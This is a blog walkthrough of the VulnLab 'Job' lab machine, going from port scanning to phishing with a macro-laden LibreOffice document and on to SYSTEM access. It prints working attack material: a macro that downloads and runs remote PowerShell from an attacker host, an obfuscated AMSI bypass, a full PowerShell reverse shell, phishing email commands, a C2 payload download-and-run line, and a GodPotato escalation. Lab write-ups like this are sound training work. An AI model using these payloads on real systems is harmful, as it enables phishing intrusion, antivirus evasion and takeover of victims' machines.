Penetration Testing - Job - VulnLab | from Phishing to Admin

Intro

Hey everyone! If you love diving into the world of cybersecurity as much as I do, you'll enjoy this detailed walkthrough of the 'Job' machine from VulnLab. This medium-level challenge not only tested my skills but also gave me some cool insights and tricks to share. In our walkthrough of the 'Job' machine at VulnLab, we'll see a practical example of how phishing can be leveraged to penetrate security defenses

From scanning ports with RustScan to crafting sneaky payloads and escalating privileges, we'll go through each step together. I've packed this post with practical tips and a bit of my own experience in tackling these kinds of challenges. So whether you're training for your next security gig or just curious about ethical hacking, I hope you'll find something useful here.

Rust Scan

└─$ rustscan -a 10.10.70.229 --ulimit 5000 -- -A -sC | tee RustScanResults.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.70.229:25
Open 10.10.70.229:80
Open 10.10.70.229:445
Open 10.10.70.229:3389
Open 10.10.70.229:5985
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.10.70.229
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-13 11:32 EEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:32
Completed NSE at 11:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:32
Completed NSE at 11:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:32
Completed NSE at 11:32, 0.00s elapsed
Initiating Ping Scan at 11:32
Scanning 10.10.70.229[2 ports]
Completed Ping Scan at 11:32, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:32
Completed Parallel DNS resolution of 1 host. at 11:32, 4.01s elapsed
DNS resolution of 1 IPs took 4.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating Connect Scan at 11:32
Scanning 10.10.70.229[5 ports]
Discovered open port 445/tcp on 10.10.70.229
Discovered open port 80/tcp on 10.10.70.229
Discovered open port 3389/tcp on 10.10.70.229
Discovered open port 25/tcp on 10.10.70.229
Discovered open port 5985/tcp on 10.10.70.229
Completed Connect Scan at 11:32, 0.05s elapsed (5 total ports)
Initiating Service scan at 11:32
Scanning 5 services on 10.10.70.229
Completed Service scan at 11:32, 13.70s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.70.229.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:32
NSE Timing: About 99.86% done; ETC: 11:32 (0:00:00 remaining)
Completed NSE at 11:33, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.75s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
Nmap scan report for 10.10.70.229
Host is up, received syn-ack (0.052s latency).
Scanned at 2024-06-13 11:32:09 EEST for 55s

PORT     STATE SERVICE       REASON  VERSION
25/tcp   open  smtp          syn-ack hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Job.local
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds? syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=job
| Issuer: commonName=job
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-12T08:22:53
| Not valid after:  2024-12-12T08:22:53
| MD5:   8539:143c:c2f2:20ad:a550:d6a3:cc5a:8ce7
| SHA-1: f9de:98a4:b31c:5b75:130d:00a7:3991:1c66:983c:8b0e
| -----BEGIN CERTIFICATE-----
| MIICyjCCAbKgAwIBAgIQPzSjYmS+4Y1N6Vynffy6SzANBgkqhkiG9w0BAQsFADAO
| MQwwCgYDVQQDEwNqb2IwHhcNMjQwNjEyMDgyMjUzWhcNMjQxMjEyMDgyMjUzWjAO
| MQwwCgYDVQQDEwNqb2IwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCY
| yNxsspQ55IuJBSIuiUbjGuGkjlFtU3EgeO+LFWzn55NFnFCPyDN0XJOSGhGvnGsw
| t2LfRfoyaQPYeFwxI1NwptlJfGN0RZivELu2gESlxMUYEmvCW/LVcO+nGw8IVE/s
| 37xJX0AXwAICGdLKbidYKG+67eGoXR8WX813h8CfXDu7PiSyxr6nHRMLUXNevOvw
| mDm4kgEaY0moqnk4JEfxDlZJGyipN0o+wQzTBOb3acxzL30hLtGOX3HUKTlOeiN1
| 2NcwTBxZ6gg1cpIlsA+k9BXuirqSJG3wjk71Aiq1MrPsa+NZjfpNa90t6pi0PtDo
| wmUeuXJ1DeNpgVk3jtvxAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsG
| A1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAPuMfFsI9hAEceX/cdm5WEcPH
| jdWoCX+NGK+PiwrnSQIYhNyB2rbCi641oFKI+eULesLI6KA5c2jgxsLSC2Vv6zLs
| HAL/kLqOJTUkHZDrXvQJOhWUKrfgIOIMYWMXfwXj+YDSQLlC640DzOdUIeaN4Zhk
| 1FeZiZFtdWV7NC5TAY4AiEDG//y8Vx2wAFd24JlnRzUJrETpC46LMDwFTCkltZKW
| PbIn2t9xrxkJAq/lg6c/uD8f1c5GcIGYsIetJxLvRr2m4aNmrIV0ghIKP8IC4FXT
| WIscF/QQLWoUOXKIxhkA4Vqs14GrPtJ83LutWq4EfYpIlmczpY5d0Ozuk4cK9Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-06-13T08:33:04+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-13T08:32:24+00:00
5985/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time: 
|   date: 2024-06-13T08:32:27
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38282/tcp): CLEAN (Timeout)
|   Check 2 (port 47499/tcp): CLEAN (Timeout)
|   Check 3 (port 47727/udp): CLEAN (Timeout)
|   Check 4 (port 43111/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

        

Checking the HTTP Port

It shows us only one email: [email protected]

Also, it states that if you are sending your resume, it should be as a libre office document. Interesting. Makes me think that we can phish them.

After some time running dirb against the website, nothing interesting was found.

Checking the SMB port

Access denied:

└─$ smbclient -L 10.10.70.229
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED        

Email Phishing

Seems phishing is the way to go. So what I did is the following.

1) Created a reverse shell named reverse.ps1"

2) Created the following Macro in order to add it to an excel document that we will later send:

REM  *****  BASIC  *****

Sub Main
    Shell("cmd /c powershell -nop -c ""iex (New-Object Net.WebClient).DownloadString('https://10.8.2.116:9090/amsibp.ps1'); iex (New-Object Net.WebClient).DownloadString('https://10.8.2.116:9090/reverse.ps1')""")
End Sub
        

Here as you can see, we need 2 files:

a) an AMSI bypass:

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);        

b) Reverse shell file:

$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
                                              

3) Added the macro to the .odt file created with Libre Write. Named it as Havoc.odt (since before that I tried using a havoc demon. AV was killing it) The following writeup provides a very good example on how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

4) Started an http listener with python in order for the file to be downloaded. The file should be in the same directory in which we run:

python -m http.server 9090        

5) Sending the email with the following command:

swaks --to [email protected] --header "Subject: Application" --body 'Hello, I am attaching the goals requested for the job position. Thank you!' --attach /home/kali/Toys/Havoc/Malicious/Havoc.odt --server job.local

Also you could use:
sendemail -s job.local -f "[email protected]" -t [email protected] -o tls=no -m "cat https://10.8.2.116:9090/revshellplease" -a /home/kali/Toys/Havoc/Malicious/CV.odt         

Creating a Havoc Demon

Now that we have a reverse shell, we can deploy a havoc demon in order to have a more stable access to this machine.

1) We create the listener:

2) Once we have the listener ready, we create a payload:

3) We put the payload in the same directory in which we have our HTTP listener (python -m http.server 9090). And then we run:

wget https://10.x.x.x:9090/job.exe -Outfile job.exe; .\job.exe        

Checking our privilege on this machine, shows that there's not much we can do in this case:

Privilege Name Description State

============================= ================================================= ===========================

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Privilege Escalation

After checking files on folders on this machine, noticed that inetpub/wwwroot will allow us to upload files to the website (as we noticed on the nmap results port 80 is opened).

We can create a new .aspx file with another reverse shell.

a) We create the payload:

b) We upload the file to C:\inetpub\wwwroot\

c) Once it is uploaded, we start our listener and then we go to the url : https://job.local/reverse.aspx and we should get the shell:

Checking the privileges:

SeImpersonatePrivilege is enabled.

Pwning the machine

So now we need to elevate privilege again to System. In order to do this we can use GodPotato.

I will run it from havoc with this command:

dotnet inline-execute /home/kali/Toys/Havoc/Malicious/GodPotato-NET35.exe -cmd C:\temp\job.exe        

once it runs, we should be getting another agent on Havoc.

In my case, the previous agent died but the new agent with system privilege was properly connected:

Now we can proceed to extract the flag:

Conclusions

And there you have it—our journey through the 'Job' machine at VulnLab comes to an end! I hope this walkthrough not only shed light on some intricate cybersecurity tactics but also sparked your enthusiasm to dive deeper into the world of ethical hacking.

As we navigated through port scanning, payload crafting, and finally gaining that satisfying shell access, remember, each step is a learning opportunity. Whether you breezed through or hit a few bumps along the way, what matters most is the experience and knowledge you've gained.